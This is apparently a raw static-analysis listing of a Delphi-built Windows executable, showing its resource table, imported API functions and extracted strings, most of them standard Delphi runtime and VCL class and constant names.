RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_CURSOR 0x0009eba4 0x000001e7 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x0009ffc0 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_ICON 0x000a00a8 0x000025a8 LANG_ENGLISH SUBLANG_ENGLISH_US 2.75 None
RT_DIALOG 0x000a2650 0x00000052 LANG_NEUTRAL SUBLANG_NEUTRAL 2.56 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_STRING 0x000a4bac 0x000002b4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.19 None
RT_RCDATA 0x000a5404 0x000000f0 LANG_ENGLISH SUBLANG_ENGLISH_US 7.12 None
RT_RCDATA 0x000a5404 0x000000f0 LANG_ENGLISH SUBLANG_ENGLISH_US 7.12 None
RT_RCDATA 0x000a5404 0x000000f0 LANG_ENGLISH SUBLANG_ENGLISH_US 7.12 None
RT_RCDATA 0x000a5404 0x000000f0 LANG_ENGLISH SUBLANG_ENGLISH_US 7.12 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x000a556c 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_ICON 0x000a5580 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US 2.02 None

Imports

0x46f13c VirtualFree
0x46f140 VirtualAlloc
0x46f144 LocalFree
0x46f148 LocalAlloc
0x46f14c GetVersion
0x46f150 GetCurrentThreadId
0x46f15c VirtualQuery
0x46f160 WideCharToMultiByte
0x46f164 MultiByteToWideChar
0x46f168 lstrlenA
0x46f16c lstrcpynA
0x46f170 LoadLibraryExA
0x46f174 GetThreadLocale
0x46f178 GetStartupInfoA
0x46f17c GetProcAddress
0x46f180 GetModuleHandleA
0x46f184 GetModuleFileNameA
0x46f188 GetLocaleInfoA
0x46f18c GetCommandLineA
0x46f190 FreeLibrary
0x46f194 FindFirstFileA
0x46f198 FindClose
0x46f19c ExitProcess
0x46f1a0 WriteFile
0x46f1a8 RtlUnwind
0x46f1ac RaiseException
0x46f1b0 GetStdHandle
0x46f1b8 GetKeyboardType
0x46f1bc LoadStringA
0x46f1c0 MessageBoxA
0x46f1c4 CharNextA
0x46f1cc RegQueryValueExA
0x46f1d0 RegOpenKeyExA
0x46f1d4 RegCloseKey
0x46f1dc SysFreeString
0x46f1e0 SysReAllocStringLen
0x46f1e4 SysAllocStringLen
0x46f1ec TlsSetValue
0x46f1f0 TlsGetValue
0x46f1f4 LocalAlloc
0x46f1f8 GetModuleHandleA
0x46f200 RegQueryValueExA
0x46f204 RegOpenKeyExA
0x46f208 RegCloseKey
0x46f210 lstrcpyA
0x46f214 WriteFile
0x46f21c WaitForSingleObject
0x46f220 VirtualQuery
0x46f224 VirtualAlloc
0x46f228 Sleep
0x46f22c SizeofResource
0x46f230 SetThreadLocale
0x46f234 SetFilePointer
0x46f238 SetEvent
0x46f23c SetErrorMode
0x46f240 SetEndOfFile
0x46f244 ResetEvent
0x46f248 ReadFile
0x46f24c MulDiv
0x46f250 LockResource
0x46f254 LoadResource
0x46f258 LoadLibraryA
0x46f264 GlobalUnlock
0x46f268 GlobalReAlloc
0x46f26c GlobalHandle
0x46f270 GlobalLock
0x46f274 GlobalFree
0x46f278 GlobalFindAtomA
0x46f27c GlobalDeleteAtom
0x46f280 GlobalAlloc
0x46f284 GlobalAddAtomA
0x46f288 GetVersionExA
0x46f28c GetVersion
0x46f290 GetTickCount
0x46f294 GetThreadLocale
0x46f29c GetSystemTime
0x46f2a0 GetSystemInfo
0x46f2a4 GetStringTypeExA
0x46f2a8 GetStdHandle
0x46f2ac GetProcAddress
0x46f2b0 GetModuleHandleA
0x46f2b4 GetModuleFileNameA
0x46f2b8 GetLocaleInfoA
0x46f2bc GetLocalTime
0x46f2c0 GetLastError
0x46f2c4 GetFullPathNameA
0x46f2c8 GetFileAttributesA
0x46f2cc GetDiskFreeSpaceA
0x46f2d0 GetDateFormatA
0x46f2d4 GetCurrentThreadId
0x46f2d8 GetCurrentProcessId
0x46f2dc GetCPInfo
0x46f2e0 GetACP
0x46f2e4 FreeResource
0x46f2e8 InterlockedExchange
0x46f2ec FreeLibrary
0x46f2f0 FormatMessageA
0x46f2f4 FindResourceA
0x46f2f8 FindFirstFileA
0x46f2fc FindClose
0x46f308 ExitThread
0x46f30c EnumCalendarInfoA
0x46f318 CreateThread
0x46f31c CreateFileA
0x46f320 CreateEventA
0x46f324 CompareStringA
0x46f328 CloseHandle
0x46f330 VerQueryValueA
0x46f338 GetFileVersionInfoA
0x46f340 UnrealizeObject
0x46f344 StretchBlt
0x46f348 SetWindowOrgEx
0x46f34c SetWinMetaFileBits
0x46f350 SetViewportOrgEx
0x46f354 SetTextColor
0x46f358 SetStretchBltMode
0x46f35c SetROP2
0x46f360 SetPixel
0x46f364 SetEnhMetaFileBits
0x46f368 SetDIBColorTable
0x46f36c SetBrushOrgEx
0x46f370 SetBkMode
0x46f374 SetBkColor
0x46f378 SelectPalette
0x46f37c SelectObject
0x46f380 SelectClipRgn
0x46f384 SaveDC
0x46f388 RestoreDC
0x46f38c Rectangle
0x46f390 RectVisible
0x46f394 RealizePalette
0x46f398 Polyline
0x46f39c PlayEnhMetaFile
0x46f3a0 PathToRegion
0x46f3a4 PatBlt
0x46f3a8 MoveToEx
0x46f3ac MaskBlt
0x46f3b0 LineTo
0x46f3b4 IntersectClipRect
0x46f3b8 GetWindowOrgEx
0x46f3bc GetWinMetaFileBits
0x46f3c0 GetTextMetricsA
0x46f3cc GetStockObject
0x46f3d0 GetPixel
0x46f3d4 GetPaletteEntries
0x46f3d8 GetObjectA
0x46f3e4 GetEnhMetaFileBits
0x46f3e8 GetDeviceCaps
0x46f3ec GetDIBits
0x46f3f0 GetDIBColorTable
0x46f3f4 GetDCOrgEx
0x46f3fc GetClipRgn
0x46f400 GetClipBox
0x46f404 GetBrushOrgEx
0x46f408 GetBitmapBits
0x46f40c ExcludeClipRect
0x46f410 DeleteObject
0x46f414 DeleteEnhMetaFile
0x46f418 DeleteDC
0x46f41c CreateSolidBrush
0x46f420 CreateRectRgn
0x46f424 CreatePenIndirect
0x46f428 CreatePalette
0x46f430 CreateFontIndirectA
0x46f434 CreateDIBitmap
0x46f438 CreateDIBSection
0x46f43c CreateCompatibleDC
0x46f444 CreateBrushIndirect
0x46f448 CreateBitmap
0x46f44c CopyEnhMetaFileA
0x46f450 BitBlt
0x46f458 CreateWindowExA
0x46f45c WindowFromPoint
0x46f460 WinHelpA
0x46f464 WaitMessage
0x46f468 UpdateWindow
0x46f46c UnregisterClassA
0x46f470 UnhookWindowsHookEx
0x46f474 TranslateMessage
0x46f47c TrackPopupMenu
0x46f484 ShowWindow
0x46f488 ShowScrollBar
0x46f48c ShowOwnedPopups
0x46f490 ShowCursor
0x46f494 SetWindowsHookExA
0x46f498 SetWindowPos
0x46f49c SetWindowPlacement
0x46f4a0 SetWindowLongA
0x46f4a4 SetTimer
0x46f4a8 SetScrollRange
0x46f4ac SetScrollPos
0x46f4b0 SetScrollInfo
0x46f4b4 SetRect
0x46f4b8 SetPropA
0x46f4bc SetParent
0x46f4c0 SetMenuItemInfoA
0x46f4c4 SetMenu
0x46f4c8 SetForegroundWindow
0x46f4cc SetFocus
0x46f4d0 SetCursor
0x46f4d4 SetClassLongA
0x46f4d8 SetCapture
0x46f4dc SetActiveWindow
0x46f4e0 SendMessageA
0x46f4e4 ScrollWindow
0x46f4e8 ScreenToClient
0x46f4ec RemovePropA
0x46f4f0 RemoveMenu
0x46f4f4 ReleaseDC
0x46f4f8 ReleaseCapture
0x46f504 RegisterClassA
0x46f508 RedrawWindow
0x46f50c PtInRect
0x46f510 PostQuitMessage
0x46f514 PostMessageA
0x46f518 PeekMessageA
0x46f51c OffsetRect
0x46f520 OemToCharA
0x46f524 MessageBoxA
0x46f528 MapWindowPoints
0x46f52c MapVirtualKeyA
0x46f530 LockWindowUpdate
0x46f534 LoadStringA
0x46f538 LoadKeyboardLayoutA
0x46f53c LoadIconA
0x46f540 LoadCursorA
0x46f544 LoadBitmapA
0x46f548 KillTimer
0x46f54c IsZoomed
0x46f550 IsWindowVisible
0x46f554 IsWindowEnabled
0x46f558 IsWindow
0x46f55c IsRectEmpty
0x46f560 IsIconic
0x46f564 IsDialogMessageA
0x46f568 IsChild
0x46f56c InvalidateRect
0x46f570 IntersectRect
0x46f574 InsertMenuItemA
0x46f578 InsertMenuA
0x46f57c InflateRect
0x46f584 GetWindowTextA
0x46f588 GetWindowRect
0x46f58c GetWindowPlacement
0x46f590 GetWindowLongA
0x46f594 GetWindowDC
0x46f598 GetTopWindow
0x46f59c GetSystemMetrics
0x46f5a0 GetSystemMenu
0x46f5a4 GetSysColorBrush
0x46f5a8 GetSysColor
0x46f5ac GetSubMenu
0x46f5b0 GetScrollRange
0x46f5b4 GetScrollPos
0x46f5b8 GetScrollInfo
0x46f5bc GetPropA
0x46f5c0 GetParent
0x46f5c4 GetWindow
0x46f5c8 GetMessagePos
0x46f5cc GetMenuStringA
0x46f5d0 GetMenuState
0x46f5d4 GetMenuItemInfoA
0x46f5d8 GetMenuItemID
0x46f5dc GetMenuItemCount
0x46f5e0 GetMenu
0x46f5e4 GetLastActivePopup
0x46f5e8 GetKeyboardState
0x46f5f0 GetKeyboardLayout
0x46f5f4 GetKeyState
0x46f5f8 GetKeyNameTextA
0x46f5fc GetIconInfo
0x46f600 GetForegroundWindow
0x46f604 GetFocus
0x46f608 GetDlgItem
0x46f60c GetDesktopWindow
0x46f610 GetDCEx
0x46f614 GetDC
0x46f618 GetCursorPos
0x46f61c GetCursor
0x46f620 GetClipboardData
0x46f624 GetClientRect
0x46f628 GetClassNameA
0x46f62c GetClassInfoA
0x46f630 GetCapture
0x46f634 GetActiveWindow
0x46f638 FrameRect
0x46f63c FindWindowA
0x46f640 FillRect
0x46f644 EqualRect
0x46f648 EnumWindows
0x46f64c EnumThreadWindows
0x46f650 EndPaint
0x46f654 EndDeferWindowPos
0x46f658 EnableWindow
0x46f65c EnableScrollBar
0x46f660 EnableMenuItem
0x46f664 DrawTextA
0x46f668 DrawMenuBar
0x46f66c DrawIconEx
0x46f670 DrawIcon
0x46f674 DrawFrameControl
0x46f678 DrawFocusRect
0x46f67c DrawEdge
0x46f680 DispatchMessageA
0x46f684 DestroyWindow
0x46f688 DestroyMenu
0x46f68c DestroyIcon
0x46f690 DestroyCursor
0x46f694 DeleteMenu
0x46f698 DeferWindowPos
0x46f69c DefWindowProcA
0x46f6a0 DefMDIChildProcA
0x46f6a4 DefFrameProcA
0x46f6a8 CreatePopupMenu
0x46f6ac CreateMenu
0x46f6b0 CreateIcon
0x46f6b4 ClientToScreen
0x46f6b8 CheckMenuItem
0x46f6bc CallWindowProcA
0x46f6c0 CallNextHookEx
0x46f6c4 BeginPaint
0x46f6c8 BeginDeferWindowPos
0x46f6cc CharNextA
0x46f6d0 CharLowerBuffA
0x46f6d4 CharLowerA
0x46f6d8 CharToOemA
0x46f6dc AdjustWindowRectEx
0x46f6e8 Sleep
0x46f6f0 SafeArrayPtrOfIndex
0x46f6f4 SafeArrayGetUBound
0x46f6f8 SafeArrayGetLBound
0x46f6fc SafeArrayCreate
0x46f700 VariantChangeType
0x46f704 VariantCopy
0x46f708 VariantClear
0x46f70c VariantInit
0x46f71c ImageList_Write
0x46f720 ImageList_Read
0x46f730 ImageList_DragMove
0x46f734 ImageList_DragLeave
0x46f738 ImageList_DragEnter
0x46f73c ImageList_EndDrag
0x46f740 ImageList_BeginDrag
0x46f744 ImageList_Remove
0x46f748 ImageList_DrawEx
0x46f74c ImageList_Replace
0x46f750 ImageList_Draw
0x46f760 ImageList_Add
0x46f768 ImageList_Destroy
0x46f76c ImageList_Create
0x46f770 InitCommonControls
0x46f778 GetSaveFileNameA
0x46f77c GetOpenFileNameA

This program must be run under Win32
`DATA
.idata
.rdata
P.reloc
P.rsrc
Boolean
False
Integer
Cardinal
String
TObject
TObject
System
IInterface
System
TInterfacedObject
SVWUQ
Z]_^[
YZ]_^[
w;;t$
SVWUQ
Z]_^[
YZ]_^[
Uhd"@
_^[YY]
_^[Y]
YZ]_^[
_^[Y]
C<"u1S
Q<"u8S
,$YXZ
~KxI[)
BkU'9
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
PPRTj
YZXtp
YZXtm1
ZTUWVSPRTj
t=HtN
Ph~;@
Uhf<@
t-Rf;
t f;J
SVWRP
Z_^[X
tVSVWU
t1SVW
t-Rf;
t f;J
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
FFF;M
^[YY]
odSelected
odGrayed
odDisabled
odChecked
odFocused
odDefault
odHotLight
odInactive
odNoAccel
odNoFocusRect
odReserved1
odReserved2
odComboBoxEdit
Windows
TOwnerDrawState
_^[Y]
_^[Y]
_^[Y]
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
TFileName
Exception
EHeapException
EOutOfMemory
EInOutError
EExternal
EExternalException
EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide
EOverflow
EUnderflow
EInvalidPointer
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
SWSVj
False
_^[Y]
TStrData
^[YY]
$Z_^[
$Z_^[
^[YY]
<*t"<0r=<9w9i
INFNAN
QS<$t
_^[YY]
t%HtIHtm
AM/PM
_^[YY]
SVWUQ
$Z]_^[
_^[Y]
QQQQQQSVW3
QQQQQSVW
D$PPj
D$LPj
_^[Y]
_^[YY]
TErrorRec
TExceptRec
t<HtH
$YZ^[
$YZ^[
WUWSj
YZ]_^[
_^[Y]
m/d/yy
mmmm d, yyyy
AMPM
AMPM
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
SVWUQ
(Z]_^[
SVWUQ
;w$t|
Z]_^[
;F$t=
;C$t4
_^[Y]
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantType
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgError`
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError(
EVariantDispatchError
t?Htb
QQQQSV
Empty
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
Int64
String
Array
ByRef
Variants
_^[YY]
_^[Y]
SVWUQ
Z]_^[
_^[Y]
False
_^[Y]
_^[YY]
$YZ^[
TAlignment
taLeftJustify
taRightJustify
taCenter
Classes
TLeftRight
Classes
TBiDiMode
bdLeftToRight
bdRightToLeft
bdRightToLeftNoAlign
bdRightToLeftReadingOnly
Classes
ssShift
ssAlt
ssCtrl
ssLeft
ssRight
ssMiddle
ssDouble
Classes
TShiftState
THelpContext
THelpType
htKeyword
htContext
Classes
TShortCut
TNotifyEvent
Sender
TObject
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerErrorD
EReadError
EWriteError
EClassNotFound
EResNotFound
EListError
EBitsError
EStringListError
EComponentError
EOutOfResourcest
EInvalidOperation
TList
TThreadList
TBits
TPersistent
TPersistent
Classes
TInterfacedPersistent
TInterfacedPersistent
Classes
TCollectionItem
TCollectionItem
Classes
TCollection
Classes
IStringsAdapter
Classes
TStrings
TStringsL
Classes
TStringItem
TStringList$
TStringList|
Classes
TStream
THandleStream
TFileStream
TCustomMemoryStreaml!A
TMemoryStream
TResourceStream
TStreamAdapter
TClassFinder
TFiler
TReader
EThreadX%A
TComponentNamel%A
IDesignerNotify
Classes
TComponent
TComponent
Classes
Name<
TBasicActionLink
TBasicAction
TBasicActiont(A
Classes
TIdentMapEntry
TRegGroup
TRegGroups
YZ]_^[
_^[Y]
_^[Y]
SVWUQ
u%CNu
Z]_^[
SVWUQ
$Z]_^[
Uh3-A
SVWUQ
Z]_^[
SVWUQ
Z]_^[
SVWUQ
Z]_^[
UhC0A
SVWUQ
$Z]_^[
Uh+3A
_^[YY]
Uh|4A
Uha5A
UhK6A
TIntConst
_^[Y]
_^[Y]
_^[YY]
_^[Y]
Uh*;A
;5H&A
UhP=A
Uh4AA
SVWUQ
Z]_^[
UhZDA
PhtFA
_^[Y]
UhIHA
%s[%d]
_^[Y]
W<CNu
UhtOA
PhdZA
Strings
_^[Y]
UhpRA
UhNRA
UhWUA
S$_^[Y]
^[YY]
UhmWA
UhPWA
_^[YY]
SVWUQ
SdZ]_^[
UhXXA
Uh3XA
UhTZA
Uh7ZA
SVWUQ
$Z]_^[
^[YY]
Uh\eA
_^[Y]
TPropFixup
TPropIntfFixup
_^[YY]
Owner
UhapA
_^[YY]
Uh#rA
_^[Y]
Uh/vA
C0_^[
UhWxA
Classes
_^[Y]
UhX|A
False
_^[YY]
QQQQ3
%s_%d
_^[YY]
^[YY]
QQQQQQQS
SVWUQ
Z]_^[
_^[Y]
S _^[
SVWUQ
Z]_^[
YZ_^[
SVWUQ
Z]_^[
G0_^[
;CDt:
R0_^[]
_^[YY]
TPUtilWindow
TColor
EInvalidGraphic
EInvalidGraphicOperation
TFontPitch
fpDefault
fpVariable
fpFixed
Graphics
TFontName
TFontCharset
TFontStyle
fsBold
fsItalic
fsUnderline
fsStrikeOut
Graphics
TFontStyles
TPenStyle
psSolid
psDash
psDot
psDashDot
psDashDotDot
psClear
psInsideFrame
Graphics
TPenMode
pmBlack
pmWhite
pmNop
pmNot
pmCopy
pmNotCopy
pmMergePenNot
pmMaskPenNot
pmMergeNotPen
pmMaskNotPen
pmMerge
pmNotMerge
pmMask
pmNotMask
pmXor
pmNotXor
Graphics
TBrushStyle
bsSolid
bsClear
bsHorizontal
bsVertical
bsFDiagonal
bsBDiagonal
bsCross
bsDiagCross
Graphics
TGraphicsObject
TGraphicsObject
Graphics
IChangeNotifier
Graphics
TFont
TFont
Graphics
CharsetX
Color<
Heightx
Name4
Pitch<
Style
TPenH
Graphics
Colort
Style<
Width
TBrush
TBrushH
Graphics
Color0
Style
TCanvas0
TCanvas
Graphics
Brush<
CopyMode
Font\
TProgressStage
psStarting
psRunning
psEnding
Graphics
TProgressEvent
Sender
TObject
Stage
TProgressStage
PercentDone
RedrawNow
Boolean
TRect
String
TGraphic
TGraphich
Graphics
TPicture
TPicture
Graphics
TSharedImage
TMetafileImage
TMetafile
TMetafile(
Graphics
TBitmapImage
TBitmap
TBitmaph
Graphics
TIconImage
TIcon
TIcon
Graphics
TResourceManager
^[YY]
_^[YY]
_^[Y]
^[YY]
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
_^[Y]
$YZ^[
E$PVSj
YZ_^[
$Z_^[
_^[YY]
C ;C$s
TFileFormat
TFileFormatsList
QQQQSV
_^[YY]
%s%s (*.%s)|*.%2:s
%s*.%s
%s (%s)|%1:s|%s
TClipboardFormats
_^[YY]
_^[Y]
3TjdP
kD$TdP
3TjdP
kD$PdP
EMFt
?TjdR
D$LPkD$XdPV
?TjdR
D$HPkD$TdPV
|$( EMFt
^[YY]
TBitmapCanvas
TBitmapCanvasH
Graphics
Uhv B
UhT B
Uh* B
UhK#B
@pPV3
Uh%(B
Uhg+B
Uh+.B
_^[YY]
Uh73B
Uhs2B
<$BMt
Uh?5B
T]_^[
s(;~ t8
;V4tA
D$*Ph
Uh.<B
C(_^[Y]
UhIAB
\$4Vj
SVWjH
TPatternManagerSV
_^[YY]
UhIFB
TObjectListLHB
TOrderedList
TStack
Uh=JB
comctl32.dll
InitCommonControlsEx
_^[Y]
GetMonitorInfoA
GetSystemMetrics
MonitorFromRect
MonitorFromWindow
MonitorFromPoint
>(r[j
GetMonitorInfo
DISPLAY
>(r[j
GetMonitorInfoA
DISPLAY
>(r[j
GetMonitorInfoW
DISPLAY
EnumDisplayMonitors
USER32.DLL
UhUSB
IHelpSelector
HelpIntfs
IHelpSystem
HelpIntfs
ICustomHelpViewer
HelpIntfs
IExtendedHelpViewer
HelpIntfs
ISpecialWinHelpViewerPTB
HelpIntfs
IHelpManager
HelpIntfs
EHelpSystemException
THelpViewerNode
THelpManager
R(FKu
Uh5_B
Uh7`B
Uh;aB
UhMbB
_^[Y]
comctl32.dll
InitializeFlatSB
UninitializeFlatSB
FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
Uh!gB
TSynchroObject
TCriticalSection
UhSnB
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
UhtrB
TEdgeBorder
ebLeft
ebTop
ebRight
ebBottom
ToolWin
TEdgeBorders
TEdgeStyle
esNone
esRaised
esLowered
ToolWin
TToolWindow
TToolWindow
ToolWin
Uh>wB
Uh!xB
UhYxB
IShellFolder
ShlObj
UhEyB
Uh}yB
TCommonDialog
TCommonDialog
Dialogs
Ctl3D
HelpContext
OnClose
OnShow
TOpenOption
ofReadOnly
ofOverwritePrompt
ofHideReadOnly
ofNoChangeDir
ofShowHelp
ofNoValidate
ofAllowMultiSelect
ofExtensionDifferent
ofPathMustExist
ofFileMustExist
ofCreatePrompt
ofShareAware
ofNoReadOnlyReturn
ofNoTestFileCreate
ofNoNetworkButton
ofNoLongNames
ofOldStyleDialog
ofNoDereferenceLinks
ofEnableIncludeNotify
ofEnableSizing
ofDontAddToRecent
ofForceShowHidden
Dialogs
TOpenOptions
TOpenOptionEx
ofExNoPlacesBar
Dialogs
TOpenOptionsEx
TOFNotifyEx
TIncludeItemEvent
TOFNotifyEx
Include
Boolean
TOpenDialog
TOpenDialog
Dialogs
DefaultExt
FileName
Filter<
